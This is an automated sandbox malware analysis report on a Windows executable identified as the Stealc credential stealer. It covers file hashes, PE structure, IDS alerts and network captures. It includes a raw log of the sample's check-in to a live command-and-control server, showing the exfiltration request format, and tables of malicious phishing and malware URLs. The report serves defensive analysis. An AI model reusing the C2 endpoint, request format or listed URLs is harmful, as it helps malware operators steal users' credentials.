https://docs.rs/getrandom#nodejs-es-module-support	file.exe, file.exe, 00000000.00000002.2156269642.0000000000E3C000.00000040.00000001.01000000.00000003.sdmp, file.exe, 00000000.00000003.2114793571.0000000004EAB000.00000004.00001000.00020000.00000000.sdmp	false	URL Reputation: safe	unknown

World Map of Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public IPs

IP	Domain	Country	Flag	ASN	ASN Name	Malicious
185.215.113.206	unknown	Portugal		206894	WHOLESALECONNECTIONSNL	true

General Information

Joe Sandbox version:	41.0.0 Charoite
Analysis ID:	1545818
Start date and time:	2024-10-31 04:15:07 +01:00
Joe Sandbox product:	CloudBasic
Overall analysis duration:	0h 3m 29s
Hypervisor based Inspection enabled:	false
Report type:	full
Cookbook file name:	default.jbs
Analysis system description:	Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of analysed new started processes analysed:	9
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	0
Technologies:	HCA enabled EGA enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Sample name:	file.exe
Detection:	MAL
Classification:	mal100.troj.evad.winEXE@1/0@1/1
EGA Information:	Successful, ratio: 100%
HCA Information:	Successful, ratio: 80% Number of executed functions: 19 Number of non-executed functions: 135
Cookbook Comments:	Found application associated with file extension: .exe Stop behavior analysis, all processes terminated

Warnings

Exclude process from analysis (whitelisted): dllhost.exe, BackgroundTransferHost.exe, backgroundTaskHost.exe
Excluded IPs from analysis (whitelisted): 93.184.221.240, 20.199.58.43, 2.23.209.133, 2.23.209.182, 2.23.209.187, 52.149.20.212, 40.69.42.241
Excluded domains from analysis (whitelisted): slscr.update.microsoft.com, otelrules.afd.azureedge.net, iris-de-prod-azsc-v2-frc.francecentral.cloudapp.azure.com, wu.azureedge.net, arc.msn.com, e86303.dscx.akamaiedge.net, www.bing.com.edgekey.net, ocsp.digicert.com, bg.apr-52dd2-0503.edgecastdns.net, cs11.wpc.v0cdn.net, ocsp.edge.digicert.com, glb.cws.prod.dcat.dsp.trafficmanager.net, hlb.apr-52dd2-0.edgecastdns.net, sls.update.microsoft.com, arc.trafficmanager.net, wu-b-net.trafficmanager.net, glb.sls.prod.dcat.dsp.trafficmanager.net, www.bing.com, client.wns.windows.com, ctldl.windowsupdate.com.delivery.microsoft.com, otelrules.azureedge.net, wu.ec.azureedge.net, ctldl.windowsupdate.com, www-www.bing.com.trafficmanager.net, fe3cr.delivery.mp.microsoft.com, fe3.delivery.mp.microsoft.com, mm-mm.bing.net.trafficmanager.net, azureedge-t-prod.trafficmanager.net

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
185.215.113.206	file.exe	Get hash	malicious	LummaC, Amadey, Credential Flusher, LummaC Stealer, Stealc, WhiteSnake Stealer	Browse	185.215.113.206/6c4adf523b719729.php
	file.exe	Get hash	malicious	Stealc, Vidar	Browse	185.215.113.206/6c4adf523b719729.php
	file.exe	Get hash	malicious	LummaC, Amadey, Credential Flusher, LummaC Stealer, Stealc, Xmrig	Browse	185.215.113.206/6c4adf523b719729.php
	file.exe	Get hash	malicious	Stealc	Browse	185.215.113.206/746f34465cf17784/vcruntime140.dll
	file.exe	Get hash	malicious	LummaC, Amadey, Credential Flusher, LummaC Stealer, Stealc	Browse	185.215.113.206/6c4adf523b719729.php
	file.exe	Get hash	malicious	Stealc, Vidar	Browse	185.215.113.206/6c4adf523b719729.php
	file.exe	Get hash	malicious	LummaC, Amadey, Credential Flusher, LummaC Stealer, Stealc	Browse	185.215.113.206/6c4adf523b719729.php
	file.exe	Get hash	malicious	Stealc	Browse	185.215.113.206/6c4adf523b719729.php
	file.exe	Get hash	malicious	Stealc, Vidar	Browse	185.215.113.206/6c4adf523b719729.php
	file.exe	Get hash	malicious	LummaC, Amadey, Credential Flusher, LummaC Stealer, Stealc	Browse	185.215.113.206/6c4adf523b719729.php

Domains

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
ax-0001.ax-msedge.net	https://app.pandadoc.com/document/v2?token=abf6587d58630a40e08d0ad15de8202e2e9c4af5	Get hash	malicious	Unknown	Browse	150.171.27.10
	Reminders for Msp-partner_ Server Alert.eml	Get hash	malicious	HTMLPhisher	Browse	150.171.27.10
	https://wetransfer.com/downloads/bd15c1f671ae60c5a56e558eb8cc43bf20241030150256/3b30cd5b9ce1ffb29d79c9118153941c20241030150256/70baef?t_exp=1730559776&t_lsid=6bd545a9-d09b-4abd-a317-124dbe9fe64d&t_network=email&t_rid=YXV0aDB8NjZlYWI0YTExODhmYzc1OGMzMmNiODIx&t_s=download_link&t_ts=1730300576&utm_campaign=TRN_TDL_01&utm	Get hash	malicious	HTMLPhisher	Browse	150.171.27.10
	https://www.mediafire.com/file/oyfycncwen0a3ue/DSP_Plan_Set.zip/file	Get hash	malicious	Unknown	Browse	150.171.27.10
	https://email.email.pandadoc.net/c/eJxMkE9vEzEQxT_N-pbKO_ba3oMPhWipiEBAoYdeqrE92zVJbGfthD-fHkWi0OOM9Hv6vResU8LNhoXsz0dK7SkG-2Z5fwRKPgf39rRsv4op3T4ujGyvBQcQIxi2WBVmDUaIIJAgaJrROA0G-iB6wRWyaIGD7DmMvZYDqJtej653A7hxHASXppOcjhgPNwVTwJD9TaLGYn1qK3pCdyDb1jOxg11aK7UTtx1MHUxYyn_E52MH04t-B9MFOjG1vKfUia3X2M_Kjc7LORAnLZT03Ds1eE-GBjOKAXojOzGxlFuco8cWc7rOMAQynlBsvBtgI0GJDY6Ob0hzI7AHR0GxvD5jir__QXSR97_ybpvLA1U6_hxPwWtiq625LJE6yfex4rnlgmurV3u20iXWv7hvCj6bWb97PBX_PTp1rg_yE2v2peCm4fpM7fWnUnp9s4sF9iOv-1rQ0zXU7Bzsvn3A0PT9nfmCQ_ioy92fAAAA__-PeqWA	Get hash	malicious	Unknown	Browse	150.171.27.10
	https://clickme.thryv.com/ls/click?upn=u001.Als7cfHaJU2yMdsJgpsIFmiRUl-2BtxcZ73D3PC6s7dEdSEpNEVf7BmEr33HzpWyzDy2Qc_OEO3HRIZ3eedLymwLhvJt9sqs3j4T3CqpVCO9A0ZKplqH1W1Ad1lCPdQBrRfbSauZPLLCLTYBsXDRt8yGG5FOZ7NK342oFTufTBA9n-2F9XZML5SAWON4OCquRGeOrZOG6X7bKIH2ouDi7O5ssZhkwdV9j8BuAetGO74HzivTb4yjw5AGX5ZMnsGYBS3vBuNNgFYRVSYVxc5dN7eCLDUr43XjgYUZE2GmJzXmN-2BelIHWKsvaOOIeqiW6cnMf2CI6MeEhodwtV2LpZJtWZhkGi5I2rlc08PnxbPlMsOj2Cr9oC-2BCWb9WuPqmZU8rqYD8CNL-2BgY3UElGOq-2BfG3NfYFdrc0Rb11eU0t5G2ihyqzzZVfI-3D#cHNjaG1pdHRAZ3Jpc3Qub3Jn	Get hash	malicious	Unknown	Browse	150.171.27.10
	https://ws.onehub.com/files/3wbmh4dn	Get hash	malicious	Unknown	Browse	150.171.27.10
	Electronic_Receipt_ATT0001.virus.html	Get hash	malicious	Unknown	Browse	150.171.28.10
	https://app.pandadoc.com/document/v2?token=2126fee3194112970cb23c51d0c56249323ace2b	Get hash	malicious	Unknown	Browse	150.171.28.10
	https://link.edgepilot.com/s/b064b0de/7_W48d8I8kGlXhrfD-hDUg?u=https://delivmodas.ks.infinitoag.com/	Get hash	malicious	Unknown	Browse	150.171.27.10
s-part-0017.t-0009.t-msedge.net	file.exe	Get hash	malicious	Stealc, Vidar	Browse	13.107.246.45
	file.exe	Get hash	malicious	Stealc	Browse	13.107.246.45
	file.exe	Get hash	malicious	Stealc, Vidar	Browse	13.107.246.45
	SecuriteInfo.com.Win32.RATX-gen.1803.21030.exe	Get hash	malicious	Unknown	Browse	13.107.246.45
	Paiement.eml	Get hash	malicious	HTMLPhisher	Browse	13.107.246.45
	https://pub-6838e3dd185d4df89d3bb3eabe6469a4.r2.dev/index.html#	Get hash	malicious	Unknown	Browse	13.107.246.45
	https:/click.mailchimp.com/track/click/30010842/docsend.com?p=eyJzIjoiT2RaN0hwNHlyY2E3VXl5TWcwMlA2eFpHVlN3IiwidiI6MSwicCI6IntcInVcIjozMDAxMDg0MixcInZcIjoxLFwidXJsXCI6XCJodHRwczpcXFwvXFxcL2RvY3NlbmQuY29tXFxcL3ZpZXdcXFwvZzZnYzZjazdtNHlkYTRpa1wiLFwiaWRcIjpcImNhZDg3NzI1Y2UzMjRiMzI4Yzk1ZGVkYWUyMzc4ZTZjXCIsXCJ1cmxfaWRzXCI6W1wiYzE5ZWU5NGJiMzA5YmZhOGQ2MDU3OGI1Mjk5NTFmOWE4NDQ0ODNhYVwiXX0ifQ#steven.davis@tu.edu	Get hash	malicious	HTMLPhisher	Browse	13.107.246.45
	https://jksvb.jnkpavers.com/?tZbf66=Tyw6/shhfkanxgsdff/&c=E,1,NSDuZCxGQc6fw5XDGugSpFh6vhsurKgNKuRtQYEvQblaeko7ktmOqkToectUm_5S_qV7IGwrOynGYnQ5TFSCJymAV2tc5TeuFegn96UyDZPOEKOyHYw,&typo=1	Get hash	malicious	Unknown	Browse	13.107.246.45
	file.exe	Get hash	malicious	Credential Flusher	Browse	13.107.246.45
	https://share.hsforms.com/11zbkP7dfTBO0LgTS5dCN0Asixz3	Get hash	malicious	Mamba2FA	Browse	13.107.246.45
fp2e7a.wpc.phicdn.net	SecuriteInfo.com.Win32.RATX-gen.1803.21030.exe	Get hash	malicious	Unknown	Browse	192.229.221.95
	https://pub-6838e3dd185d4df89d3bb3eabe6469a4.r2.dev/index.html#	Get hash	malicious	Unknown	Browse	192.229.221.95
	https:/click.mailchimp.com/track/click/30010842/docsend.com?p=eyJzIjoiT2RaN0hwNHlyY2E3VXl5TWcwMlA2eFpHVlN3IiwidiI6MSwicCI6IntcInVcIjozMDAxMDg0MixcInZcIjoxLFwidXJsXCI6XCJodHRwczpcXFwvXFxcL2RvY3NlbmQuY29tXFxcL3ZpZXdcXFwvZzZnYzZjazdtNHlkYTRpa1wiLFwiaWRcIjpcImNhZDg3NzI1Y2UzMjRiMzI4Yzk1ZGVkYWUyMzc4ZTZjXCIsXCJ1cmxfaWRzXCI6W1wiYzE5ZWU5NGJiMzA5YmZhOGQ2MDU3OGI1Mjk5NTFmOWE4NDQ0ODNhYVwiXX0ifQ#steven.davis@tu.edu	Get hash	malicious	HTMLPhisher	Browse	192.229.221.95
	https://jksvb.jnkpavers.com/?tZbf66=Tyw6/shhfkanxgsdff/&c=E,1,NSDuZCxGQc6fw5XDGugSpFh6vhsurKgNKuRtQYEvQblaeko7ktmOqkToectUm_5S_qV7IGwrOynGYnQ5TFSCJymAV2tc5TeuFegn96UyDZPOEKOyHYw,&typo=1	Get hash	malicious	Unknown	Browse	192.229.221.95
	https://share.hsforms.com/11zbkP7dfTBO0LgTS5dCN0Asixz3	Get hash	malicious	Mamba2FA	Browse	192.229.221.95
	https://app.pandadoc.com/document/v2?token=abf6587d58630a40e08d0ad15de8202e2e9c4af5	Get hash	malicious	Unknown	Browse	192.229.221.95
	FormulariomillasbonusLATAM_GsqrekXCVBmUf.cmd	Get hash	malicious	Unknown	Browse	192.229.221.95
	67JPbskewt.exe	Get hash	malicious	Unknown	Browse	192.229.221.95
	file.exe	Get hash	malicious	LummaC	Browse	192.229.221.95
	https://register.edx.org/verizon?&utm_source=vsf_e_paid-ggl-ubrnd&utm_medium=cpc&utm_campaign=GGL%7CEDX%7CAI%7CVSF%7CSEM%7CNBD%7CUS&gad_source=1&gclid=Cj0KCQjwj4K5BhDYARIsAD1Ly2pyzBeRgn77ojfsMTtg7r8SaT93hKq6Ob_f1zsDj7Kj8dy-Mn9a7tMaAng3EALw_wcB&_gl=11dphwek_gcl_awR0NMLjE3MzAyMTU4NDAuQ2owS0NRandqNEs1QmhEWUFSSXNBRDFMeTJweXpCZVJnbjc3b2pmc01UdGc3cjhTYVQ5M2hLcTZPYl9mMXpzRGo3S2o4ZHktTW45YTd0TWFBbmczRUFMd193Y0I._gcl_auMzQxNzQzMjE1LjE3MzAyMTU4Mzg._gaMTE0OTEyNzE2Ni4xNzMwMjE1ODM5_ga_D3KS4KMDT0*MTczMDIxNTgzOS4xLjAuMTczMDIxNTgzOS42MC4wLjA	Get hash	malicious	Unknown	Browse	192.229.221.95

ASNs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
WHOLESALECONNECTIONSNL	file.exe	Get hash	malicious	LummaC, Amadey, Credential Flusher, LummaC Stealer, Stealc, WhiteSnake Stealer	Browse	185.215.113.206
	file.exe	Get hash	malicious	Stealc, Vidar	Browse	185.215.113.206
	file.exe	Get hash	malicious	LummaC, Amadey, Credential Flusher, LummaC Stealer, Stealc, Xmrig	Browse	185.215.113.16
	file.exe	Get hash	malicious	Stealc	Browse	185.215.113.206
	file.exe	Get hash	malicious	LummaC, Amadey, Credential Flusher, LummaC Stealer, Stealc	Browse	185.215.113.206
	file.exe	Get hash	malicious	Stealc, Vidar	Browse	185.215.113.206
	file.exe	Get hash	malicious	LummaC, Amadey, Credential Flusher, LummaC Stealer, Stealc	Browse	185.215.113.16
	file.exe	Get hash	malicious	Stealc	Browse	185.215.113.206
	file.exe	Get hash	malicious	Stealc, Vidar	Browse	185.215.113.206
	file.exe	Get hash	malicious	LummaC, Amadey, Credential Flusher, LummaC Stealer, Stealc	Browse	185.215.113.206

File type:	PE32 executable (GUI) Intel 80386, for MS Windows
Entropy (8bit):	7.960624885056571
TrID:	Win32 Executable (generic) a (10002005/4) 99.96% Generic Win/DOS Executable (2004/3) 0.02% DOS Executable Generic (2002/1) 0.02% Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
File name:	file.exe
File size:	2'085'888 bytes
MD5:	e4b956c7c98758b0fedda4156545593d
SHA1:	42debf379a13bf4ea20036bfb780ad49b5e95bd6
SHA256:	7d163fd79c3d69b1b2c9d00c90f9ea3379f94b504bd55192a483f528d6ac52c9
SHA512:	ae96b3ec6fb1c7476ba3f3a5ab4a5e9ab97c8026b77ca8fbec4daeb6e6c93bcb5aa8b4b52b6e65488824fe91c13549ca2f8dc325bb8a54c160d17ce3bee324b8
SSDEEP:	49152:BrvI9TGLcKUR4+zpwxGDmNE6m0O/9X0Lwu7B5ovFbm:BrvITtK6BtFB6o/9x/Fi
TLSH:	2FA533E353233BE8E22D0F73074F6E5336149AE54DB2BF48980EC1B85A4B1A5695849F
File Content Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........b.}.............u^......uk......u_......{v.....fz./.....{f..............uZ......uh.....Rich....................PE..L...8n.g...

File Icon


Icon Hash:	00928e8e8686b000

Static PE Info

General

Entrypoint:	0xb13000
Entrypoint Section:	.taggant
Digitally signed:	false
Imagebase:	0x400000
Subsystem:	windows gui
Image File Characteristics:	EXECUTABLE_IMAGE, 32BIT_MACHINE
DLL Characteristics:	DYNAMIC_BASE, TERMINAL_SERVER_AWARE
Time Stamp:	0x671E6E38 [Sun Oct 27 16:45:44 2024 UTC]
TLS Callbacks:
CLR (.Net) Version:
OS Version Major:	5
OS Version Minor:	1
File Version Major:	5
File Version Minor:	1
Subsystem Version Major:	5
Subsystem Version Minor:	1
Import Hash:	2eabe9054cad5152567f0699947a2c5b

Entrypoint Preview

Instruction
jmp 00007F1DD51677AAh
lss ebx, dword ptr [edi]
add byte ptr [eax], al
add byte ptr [eax], al
add cl, ch
add byte ptr [eax], ah
add byte ptr [eax], al
add byte ptr [esi], al
or al, byte ptr [eax]
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], dh
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax+eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
push es
or al, byte ptr [eax]
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [esi], al
add byte ptr [eax], 00000000h
add byte ptr [eax], al
add byte ptr [eax], al
adc byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
push es
or al, byte ptr [eax]
add byte ptr [eax], al
add byte ptr [eax], al

Rich Headers

Programming Language:

[C++] VS2010 build 30319
[ASM] VS2010 build 30319
[ C ] VS2010 build 30319
[ C ] VS2008 SP1 build 30729
[IMP] VS2008 SP1 build 30729
[LNK] VS2010 build 30319

Data Directories

Name	Virtual Address	Virtual Size	Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IMPORT	0x2e9050	0x64	.idata
IMAGE_DIRECTORY_ENTRY_RESOURCE	0x0	0x0
IMAGE_DIRECTORY_ENTRY_EXCEPTION	0x0	0x0
IMAGE_DIRECTORY_ENTRY_SECURITY	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BASERELOC	0x2e91f8	0x8	.idata
IMAGE_DIRECTORY_ENTRY_DEBUG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COPYRIGHT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_GLOBALPTR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_TLS	0x0	0x0
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IAT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_RESERVED	0x0	0x0

Sections

Name	Virtual Address	Virtual Size	Raw Size	MD5	Xored PE	ZLIB Complexity	File Type	Entropy	Characteristics
	0x1000	0x2e7000	0x67600	612ac48491889399e9f6df9f9eed0fbe	unknown	unknown	unknown	unknown	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.rsrc	0x2e8000	0x1000	0x0	d41d8cd98f00b204e9800998ecf8427e	False	0	empty	0.0	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.idata	0x2e9000	0x1000	0x200	049071433b9f7c843453337b0fd53002	False	0.1328125	data	0.8946074494647072	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
	0x2ea000	0x295000	0x200	df55977bbc3b484a6f359ded60f65074	unknown	unknown	unknown	unknown	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
usisoqoi	0x57f000	0x193000	0x192400	9f3544f0d141b109040696a935aed29a	False	0.9949866959291486	data	7.953872207980885	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
igxiqctn	0x712000	0x1000	0x400	ced2dc4ce2d9735355c1f73b22e52600	False	0.8046875	data	6.240049276982909	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.taggant	0x713000	0x3000	0x2200	64777302857f690beb7ce967c82d82d5	False	0.0646829044117647	DOS executable (COM)	0.7504375401310389	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE

Imports

DLL	Import
kernel32.dll	lstrcpy

Network Behavior

Suricata IDS Alerts

Timestamp	SID	Signature	Severity	Source IP	Source Port	Dest IP	Dest Port	Protocol
2024-10-31T04:16:02.780418+0100	2044243	ET MALWARE [SEKOIA.IO] Win32/Stealc C2 Check-in	1	192.168.2.6	49725	185.215.113.206	80	TCP

Network Port Distribution

TCP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Oct 31, 2024 04:16:01.558183908 CET	49725	80	192.168.2.6	185.215.113.206
Oct 31, 2024 04:16:01.563186884 CET	80	49725	185.215.113.206	192.168.2.6
Oct 31, 2024 04:16:01.563374996 CET	49725	80	192.168.2.6	185.215.113.206
Oct 31, 2024 04:16:01.565642118 CET	49725	80	192.168.2.6	185.215.113.206
Oct 31, 2024 04:16:01.570467949 CET	80	49725	185.215.113.206	192.168.2.6
Oct 31, 2024 04:16:02.484035969 CET	80	49725	185.215.113.206	192.168.2.6
Oct 31, 2024 04:16:02.484097958 CET	49725	80	192.168.2.6	185.215.113.206
Oct 31, 2024 04:16:02.489063025 CET	49725	80	192.168.2.6	185.215.113.206
Oct 31, 2024 04:16:02.493978024 CET	80	49725	185.215.113.206	192.168.2.6
Oct 31, 2024 04:16:02.780349016 CET	80	49725	185.215.113.206	192.168.2.6
Oct 31, 2024 04:16:02.780417919 CET	49725	80	192.168.2.6	185.215.113.206
Oct 31, 2024 04:16:05.368926048 CET	49725	80	192.168.2.6	185.215.113.206

UDP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Oct 31, 2024 04:15:56.359366894 CET	53021	53	192.168.2.6	1.1.1.1

DNS Queries

Timestamp	Source IP	Dest IP	Trans ID	OP Code	Name	Type	Class	DNS over HTTPS
Oct 31, 2024 04:15:56.359366894 CET	192.168.2.6	1.1.1.1	0x177	Standard query (0)	tse1.mm.bing.net	A (IP address)	IN (0x0001)	false

DNS Answers

Timestamp	Source IP	Dest IP	Trans ID	Reply Code	Name	CName	Address	Type	Class	DNS over HTTPS
Oct 31, 2024 04:15:56.366658926 CET	1.1.1.1	192.168.2.6	0x177	No error (0)	tse1.mm.bing.net	mm-mm.bing.net.trafficmanager.net		CNAME (Canonical name)	IN (0x0001)	false
Oct 31, 2024 04:15:56.366658926 CET	1.1.1.1	192.168.2.6	0x177	No error (0)	ax-0001.ax-msedge.net		150.171.27.10	A (IP address)	IN (0x0001)	false
Oct 31, 2024 04:15:56.366658926 CET	1.1.1.1	192.168.2.6	0x177	No error (0)	ax-0001.ax-msedge.net		150.171.28.10	A (IP address)	IN (0x0001)	false
Oct 31, 2024 04:16:08.951719999 CET	1.1.1.1	192.168.2.6	0xaa06	No error (0)	shed.dual-low.s-part-0017.t-0009.t-msedge.net	s-part-0017.t-0009.t-msedge.net		CNAME (Canonical name)	IN (0x0001)	false
Oct 31, 2024 04:16:08.951719999 CET	1.1.1.1	192.168.2.6	0xaa06	No error (0)	s-part-0017.t-0009.t-msedge.net		13.107.246.45	A (IP address)	IN (0x0001)	false
Oct 31, 2024 04:16:15.537678003 CET	1.1.1.1	192.168.2.6	0x1fc1	No error (0)	fp2e7a.wpc.2be4.phicdn.net	fp2e7a.wpc.phicdn.net		CNAME (Canonical name)	IN (0x0001)	false
Oct 31, 2024 04:16:15.537678003 CET	1.1.1.1	192.168.2.6	0x1fc1	No error (0)	fp2e7a.wpc.phicdn.net		192.229.221.95	A (IP address)	IN (0x0001)	false

HTTP Request Dependency Graph

185.215.113.206

HTTP Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
0	192.168.2.6	49725	185.215.113.206	80	716	C:\Users\user\Desktop\file.exe

Timestamp	Bytes transferred	Direction	Data
Oct 31, 2024 04:16:01.565642118 CET	90	OUT	GET / HTTP/1.1 Host: 185.215.113.206 Connection: Keep-Alive Cache-Control: no-cache
Oct 31, 2024 04:16:02.484035969 CET	203	IN	HTTP/1.1 200 OK Date: Thu, 31 Oct 2024 03:16:02 GMT Server: Apache/2.4.41 (Ubuntu) Content-Length: 0 Keep-Alive: timeout=5, max=100 Connection: Keep-Alive Content-Type: text/html; charset=UTF-8
Oct 31, 2024 04:16:02.489063025 CET	413	OUT	POST /6c4adf523b719729.php HTTP/1.1 Content-Type: multipart/form-data; boundary=----IEHCAKKJDBKKFHJJDHII Host: 185.215.113.206 Content-Length: 211 Connection: Keep-Alive Cache-Control: no-cache Data Raw: 2d 2d 2d 2d 2d 2d 49 45 48 43 41 4b 4b 4a 44 42 4b 4b 46 48 4a 4a 44 48 49 49 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 43 45 45 46 36 42 37 39 33 33 45 32 33 39 32 34 36 39 36 33 33 30 0d 0a 2d 2d 2d 2d 2d 2d 49 45 48 43 41 4b 4b 4a 44 42 4b 4b 46 48 4a 4a 44 48 49 49 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 22 0d 0a 0d 0a 74 61 6c 65 0d 0a 2d 2d 2d 2d 2d 2d 49 45 48 43 41 4b 4b 4a 44 42 4b 4b 46 48 4a 4a 44 48 49 49 2d 2d 0d 0a Data Ascii: ------IEHCAKKJDBKKFHJJDHIIContent-Disposition: form-data; name="hwid"CEEF6B7933E23924696330------IEHCAKKJDBKKFHJJDHIIContent-Disposition: form-data; name="build"tale------IEHCAKKJDBKKFHJJDHII--
Oct 31, 2024 04:16:02.780349016 CET	210	IN	HTTP/1.1 200 OK Date: Thu, 31 Oct 2024 03:16:02 GMT Server: Apache/2.4.41 (Ubuntu) Content-Length: 8 Keep-Alive: timeout=5, max=99 Connection: Keep-Alive Content-Type: text/html; charset=UTF-8 Data Raw: 59 6d 78 76 59 32 73 3d Data Ascii: YmxvY2s=

Target ID:	0
Start time:	23:15:57
Start date:	30/10/2024
Path:	C:\Users\user\Desktop\file.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\Desktop\file.exe"
Imagebase:	0xe10000
File size:	2'085'888 bytes
MD5 hash:	E4B956C7C98758B0FEDDA4156545593D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_Stealc, Description: Yara detected Stealc, Source: 00000000.00000002.2155893924.0000000000998000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_Stealc, Description: Yara detected Stealc, Source: 00000000.00000002.2156269642.0000000000E11000.00000040.00000001.01000000.00000003.sdmp, Author: Joe Security Rule: JoeSecurity_Stealc, Description: Yara detected Stealc, Source: 00000000.00000003.2114793571.0000000004E80000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
Reputation:	low
Has exited:	true

Show Windows behavior

Execution Graph

Execution Coverage:	3%
Dynamic/Decrypted Code Coverage:	0%
Signature Coverage:	3.5%
Total number of Nodes:	1327
Total number of Limit Nodes:	24

Executed Functions

Function 00E29BB0 Relevance: 59.7, APIs: 33, Strings: 1, Instructions: 212
libraryloaderCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetProcAddress.KERNEL32(76210000,00991728), ref: 00E29BF1
GetProcAddress.KERNEL32(76210000,009914E8), ref: 00E29C0A
GetProcAddress.KERNEL32(76210000,00991698), ref: 00E29C22
GetProcAddress.KERNEL32(76210000,009915D8), ref: 00E29C3A
GetProcAddress.KERNEL32(76210000,00991530), ref: 00E29C53
GetProcAddress.KERNEL32(76210000,00998C48), ref: 00E29C6B
GetProcAddress.KERNEL32(76210000,00985508), ref: 00E29C83
GetProcAddress.KERNEL32(76210000,00985608), ref: 00E29C9C
GetProcAddress.KERNEL32(76210000,00991608), ref: 00E29CB4
GetProcAddress.KERNEL32(76210000,009916B0), ref: 00E29CCC
GetProcAddress.KERNEL32(76210000,00991788), ref: 00E29CE5
GetProcAddress.KERNEL32(76210000,00991500), ref: 00E29CFD
GetProcAddress.KERNEL32(76210000,009856C8), ref: 00E29D15
GetProcAddress.KERNEL32(76210000,009916C8), ref: 00E29D2E
GetProcAddress.KERNEL32(76210000,009916E0), ref: 00E29D46
GetProcAddress.KERNEL32(76210000,00985628), ref: 00E29D5E
GetProcAddress.KERNEL32(76210000,00991638), ref: 00E29D77
